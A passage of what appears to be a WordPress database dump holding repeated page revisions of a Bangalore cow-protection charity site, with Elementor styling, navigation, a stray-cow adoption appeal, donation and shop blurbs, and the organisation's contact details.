https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 09:55:11','2022-10-20 04:25:11','',1816,'https://gopalak.in/?p=1893',0,'revision','',0),(1894,1,'2022-10-20 11:03:35','2022-10-20 05:33:35','','GOPALAK-COIN-2','','inherit','open','closed','','gopalak-coin-2','','','2022-10-20 11:03:35','2022-10-20 05:33:35','',1816,'https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.png',0,'attachment','image/png',0),(1896,1,'2022-10-20 11:10:06','2022-10-20 05:40:06','','GOPALAK COIN-2.0','','inherit','open','closed','','gopalak-coin-2-0','','','2022-10-20 11:10:06','2022-10-20 05:40:06','',1816,'https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0.png',0,'attachment','image/png',0),(1897,1,'2022-10-20 11:10:34','2022-10-20 05:40:34','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 11:10:34','2022-10-20 05:40:34','',1816,'https://gopalak.in/?p=1897',0,'revision','',0),(1898,1,'2022-10-20 11:10:34','2022-10-20 05:40:34','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 11:10:34','2022-10-20 05:40:34','',1816,'https://gopalak.in/?p=1898',0,'revision','',0),(1899,1,'2022-10-20 11:10:34','2022-10-20 05:40:34','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-768x768.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/GOPALAK-COIN-2.0-pwh7pivzzxoisxtaw3iodq3bqsq80x3rkk57uej99q.png 75w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0.png 1000w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 11:10:34','2022-10-20 05:40:34','',1816,'https://gopalak.in/?p=1899',0,'revision','',0),(1900,1,'2022-10-20 11:12:01','2022-10-20 05:42:01','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 11:12:01','2022-10-20 05:42:01','',1373,'https://gopalak.in/?p=1900',0,'revision','',0),(1901,1,'2022-10-20 11:12:01','2022-10-20 05:42:01','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 11:12:01','2022-10-20 05:42:01','',1373,'https://gopalak.in/?p=1901',0,'revision','',0),(1902,1,'2022-10-20 11:12:01','2022-10-20 05:42:01','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-768x768.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-48x48.png 48w, 